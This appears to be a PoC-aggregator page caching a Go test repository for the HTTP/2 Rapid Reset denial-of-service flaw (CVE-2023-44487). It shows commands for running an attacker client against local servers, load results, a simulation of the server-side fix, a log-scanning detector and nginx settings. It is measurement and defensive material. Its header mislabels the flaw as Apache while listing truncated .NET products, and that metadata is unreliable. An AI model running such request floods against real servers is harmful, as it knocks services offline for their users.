POC details: a0299d4298489418b4eaa9e101bea6eb3edaf800

Source
Related vulnerability
Title: Apache HTTP/2 resource management error vulnerability (CVE-2023-44487)
Description: HTTP/2 is the second version of the Hypertext Transfer Protocol, used to carry communication between clients and servers. Apache HTTP/2 has a security vulnerability that an attacker can exploit to cause a denial of service. The following products and versions are affected: .NET 6.0, ASP.NET Core 6.0, .NET 7.0, Microsoft Visual Studio 2022 version 17.2, Microsoft Visual Studio 2022 version 17.4, Microsoft Visual Studio 2022 version 17.6, Micros
Introduction
# Golang CVE-2023-44487 testing

This repository contains testing resources and results for CVE-2023-44487, the HTTP/2 "Rapid Reset" attack: the client opens a stream with HEADERS and immediately cancels it with RST_STREAM, so the server keeps paying the per-stream setup and handler cost while the client's cost per stream stays near zero and the advertised concurrent-stream limit is never reached.
It uses a modified version of https://github.com/secengjeff/rapidresetclient to test against various Go server configurations.

## Testing against a normal server

```bash
go run server.go
go run attacker.go -requests 500000
```

### Results

**go 1.21.0**
```text
350% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Total time: 7.99 seconds (62562 rps)
```

**go 1.21.3**
```text
75% CPU load (only briefly, at the beginning of the attack)

--- Summary ---
Frames sent: HEADERS = 74767, RST_STREAM = 74767
Total time: 3.57 seconds (20921 rps)

the attacker starts failing fast with (one message per line):
62->[::1]:8443: write: connection reset by peer
[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
```
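What separates the two runs above is how the server accounts for handler goroutines on one connection. The model below is added here as an illustration; it is not code from this repository or from Go's net/http. It replays the attack pattern against two accounting policies: the pre-fix one, where every HEADERS frame starts a handler goroutine that the client's RST_STREAM cannot stop, and the post-fix one, where at most `MaxConcurrentStreams` handlers run, later streams wait in a queue, and a queue longer than four times the limit closes the connection with ENHANCE_YOUR_CALM (the error the reverse-proxy run later on this page logs). The constants (250 streams, the 4x queue bound) and the handler-done bookkeeping follow my reading of the Go 1.21.3 / golang.org/x/net v0.17.0 patch and should be treated as assumptions; the stream IDs and burst sizes are constructed. Because no handler is allowed to finish during the simulated burst, the count accepted before the connection closes is the worst case, and a real server that drains its queue tolerates more.

```go
package main

import (
	"errors"
	"fmt"
)

// ErrEnhanceYourCalm models the connection-level error the patched server
// returns when too many streams are waiting for a handler goroutine.
var ErrEnhanceYourCalm = errors.New("connection error: ENHANCE_YOUR_CALM")

// streamAccounting models per-connection handler accounting (assumption:
// shaped after the Go 1.21.3 / x/net v0.17.0 fix, not copied from it).
// maxStreams == 0 models the unpatched server: every HEADERS frame starts a
// goroutine at once. maxStreams > 0 models the patched server: at most
// maxStreams handlers run, further streams queue, and a queue longer than
// 4*maxStreams tears the connection down.
type streamAccounting struct {
	maxStreams  int
	running     int
	peakRunning int
	queued      []uint32
	open        map[uint32]bool // streams the client has not yet reset
}

func newStreamAccounting(maxStreams int) *streamAccounting {
	return &streamAccounting{maxStreams: maxStreams, open: map[uint32]bool{}}
}

// start records one more handler goroutine and tracks the high-water mark.
// A goroutine that has started keeps running even if the stream is reset.
func (s *streamAccounting) start() {
	s.running++
	if s.running > s.peakRunning {
		s.peakRunning = s.running
	}
}

// Headers is called for each HEADERS frame that opens a new stream.
func (s *streamAccounting) Headers(id uint32) error {
	s.open[id] = true
	if s.maxStreams == 0 || s.running < s.maxStreams {
		s.start()
		return nil
	}
	if len(s.queued) > 4*s.maxStreams {
		return ErrEnhanceYourCalm
	}
	s.queued = append(s.queued, id)
	return nil
}

// Reset is called for each RST_STREAM frame. A queued stream is not removed
// here; it is skipped for free when the queue is drained.
func (s *streamAccounting) Reset(id uint32) {
	delete(s.open, id)
}

// HandlerDone is called when a running handler returns. It starts queued
// handlers whose streams are still open, up to the concurrency limit.
func (s *streamAccounting) HandlerDone() {
	s.running--
	i := 0
	for ; i < len(s.queued); i++ {
		if !s.open[s.queued[i]] {
			continue // reset before its handler started: no work done
		}
		if s.running >= s.maxStreams {
			break
		}
		s.start()
	}
	s.queued = s.queued[i:]
}

// simulateRapidReset replays a Rapid Reset burst of `requests` HEADERS frames,
// each immediately followed by RST_STREAM, with handlers too slow to finish
// during the burst. It returns how many HEADERS the connection accepted before
// erroring, the peak number of concurrently running handlers, and the error
// that closed the connection (nil if it never closed).
func simulateRapidReset(requests, maxStreams int) (accepted, peak int, err error) {
	s := newStreamAccounting(maxStreams)
	for i := 0; i < requests; i++ {
		id := uint32(2*i + 1) // client-initiated streams use odd IDs
		if err = s.Headers(id); err != nil {
			return accepted, s.peakRunning, err
		}
		accepted++
		s.Reset(id)
	}
	return accepted, s.peakRunning, nil
}

func main() {
	for _, max := range []int{0, 250} {
		accepted, peak, err := simulateRapidReset(500000, max)
		fmt.Printf("maxStreams=%d: accepted HEADERS=%d peak handlers=%d err=%v\n",
			max, accepted, peak, err)
	}
}
```

With the unpatched policy the 500000 HEADERS frames become 500000 live goroutines (the CPU load in the go 1.21.0 run); with the patched policy the server never runs more than 250 handlers and closes the connection once 1001 streams are queued, which is the "connection reset by peer" the attacker sees.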

## Testing against a gRPC server

```bash
go run grpcserver.go
go run attacker.go -requests 500000
```

### Results

**go 1.21.0, golang.org/x/net v0.16.0, google.golang.org/grpc v1.58.0**
```text
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499998
Total time: 10.23 seconds (48898 rps)
```

**go 1.21.3, golang.org/x/net v0.17.0, google.golang.org/grpc v1.59.0**
```text
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499993
Total time: 8.25 seconds (60639 rps)
```

> The attacker does not actually call gRPC endpoints, so there seems to be no difference in behaviour from "normal" HTTP/2 calls.
> Not super sure whether this is good or bad, but the server manages to keep up with the traffic.


## Testing against a httputil.ReverseProxy server

```bash
# use nginx as target
sudo nginx -c $PWD/nginx/vulnerable_8444.conf -g daemon\ off\;
go run revproxyserver.go
go run attacker.go -requests 500000
```

### Results

**go 1.21.0**
```text
200% CPU load during the full attack

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 25
Total time: 9.43 seconds (53014 rps)
```

**go 1.21.3**
```text
150% CPU load (only briefly, at the beginning of the attack)

--- Summary ---
Frames sent: HEADERS = 100194, RST_STREAM = 100193
Total time: 4.36 seconds (22955 rps)

the attacker starts failing fast with (one message per line):
62->[::1]:8443: write: connection reset by peer
[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

Server log now contains 😎
2023/10/25 14:45:54 http2: server connection error from [::1]:60762: connection error: ENHANCE_YOUR_CALM
```
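That ENHANCE_YOUR_CALM line is the detection signal a patched Go server gives you: one entry per connection it tore down. The scanner below is added here as an example (not code from this repository) that tallies those entries per client address, port stripped, since each rejected connection comes from a fresh source port, and lists the addresses that cross a threshold. The sample log is constructed: only its first line copies the one shown above, the rest are invented to exercise the counting, and the threshold is arbitrary.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"sort"
	"strings"
)

// calmLine matches the connection-error line a patched Go http2 server
// writes to its error log when it applies the Rapid Reset limit.
var calmLine = regexp.MustCompile(
	`^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) http2: server connection error from (\S+): connection error: ENHANCE_YOUR_CALM$`)

// countCalmErrors tallies ENHANCE_YOUR_CALM connection errors per client host.
// Lines that do not match the pattern are ignored.
func countCalmErrors(lines []string) map[string]int {
	counts := map[string]int{}
	for _, line := range lines {
		m := calmLine.FindStringSubmatch(strings.TrimSpace(line))
		if m == nil {
			continue
		}
		host, _, err := net.SplitHostPort(m[2])
		if err != nil {
			host = m[2] // no port in the address: keep it as logged
		}
		counts[host]++
	}
	return counts
}

// offenders returns the hosts with at least threshold errors, most errors first
// (ties broken by host string so the output is deterministic).
func offenders(counts map[string]int, threshold int) []string {
	var out []string
	for host, n := range counts {
		if n >= threshold {
			out = append(out, host)
		}
	}
	sort.Slice(out, func(i, j int) bool {
		if counts[out[i]] != counts[out[j]] {
			return counts[out[i]] > counts[out[j]]
		}
		return out[i] < out[j]
	})
	return out
}

// sampleLog is constructed for this example; only the first line is the one
// the README shows, the others are invented (203.0.113.0/24 is documentation space).
var sampleLog = []string{
	"2023/10/25 14:45:54 http2: server connection error from [::1]:60762: connection error: ENHANCE_YOUR_CALM",
	"2023/10/25 14:45:55 http2: server connection error from [::1]:60764: connection error: ENHANCE_YOUR_CALM",
	"2023/10/25 14:45:55 http2: server connection error from [::1]:60766: connection error: ENHANCE_YOUR_CALM",
	"2023/10/25 14:45:56 http2: server connection error from 203.0.113.7:51234: connection error: ENHANCE_YOUR_CALM",
	"2023/10/25 14:45:56 http: TLS handshake error from 203.0.113.9:40000: EOF",
	"2023/10/25 14:45:57 http2: server connection error from 203.0.113.7:51240: connection error: PROTOCOL_ERROR",
}

func main() {
	counts := countCalmErrors(sampleLog)
	for _, host := range offenders(counts, 2) {
		fmt.Printf("%s: %d connections closed with ENHANCE_YOUR_CALM\n", host, counts[host])
	}
}
```

A client that keeps reconnecting after each reset shows up as a run of these lines from one host, so aggregate on the host rather than on the full `host:port` pair; a single entry from a legitimate client that opened a burst of requests is normal and should not page anyone.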

## Testing against nginx

```bash
# the snapshot ships this config as nginx/vulnerable_8443.conf (the attacker targets port 8443)
sudo nginx -c $PWD/nginx/vulnerable_8443.conf -g daemon\ off\;
go run attacker.go -requests 500000
```

### Results

**With vulnerable config**

```text
100% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 478609
Total time: 8.13 seconds (61484 rps)
```

**With default config** (`nginx/defaults.conf` in the snapshot)
```text
34% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 1432
Total time: 7.62 seconds (65588 rps)
```

> Nginx just stops responding to a lot of the frames.

With stock settings nginx closes a connection after `keepalive_requests` requests (default 1000, and since nginx 1.19.7 this applies to HTTP/2 as well) and caps open streams at `http2_max_concurrent_streams` (default 128), which is why the default profile answers only a small fraction of the 500000 streams; the "vulnerable" profile presumably lifts those limits. Those two directives are the first thing to check on an nginx front end.

File snapshot

```text
[4.0K] /data/pocs/a0299d4298489418b4eaa9e101bea6eb3edaf800
├── [5.3K] attacker.go
├── [4.0K] certs
│   ├── [1.2K] server.crt
│   └── [1.7K] server.key
├── [ 560] go.mod
├── [1.8K] go.sum
├── [1.5K] grpcserver.go
├── [ 11K] LICENSE
├── [4.0K] nginx
│   ├── [ 401] defaults.conf
│   ├── [ 69] README.md
│   ├── [1.2K] server.crt
│   ├── [1.7K] server.key
│   ├── [ 540] vulnerable_8443.conf
│   └── [ 541] vulnerable_8444.conf
├── [4.0K] proto
│   ├── [5.9K] ping.pb.go
│   └── [ 242] ping.proto
├── [4.3K] README.md
├── [ 533] revproxyserver.go
└── [ 384] server.go

3 directories, 18 files
```
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the POC through the source link above.
    2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for local POCs. Thank you for your support.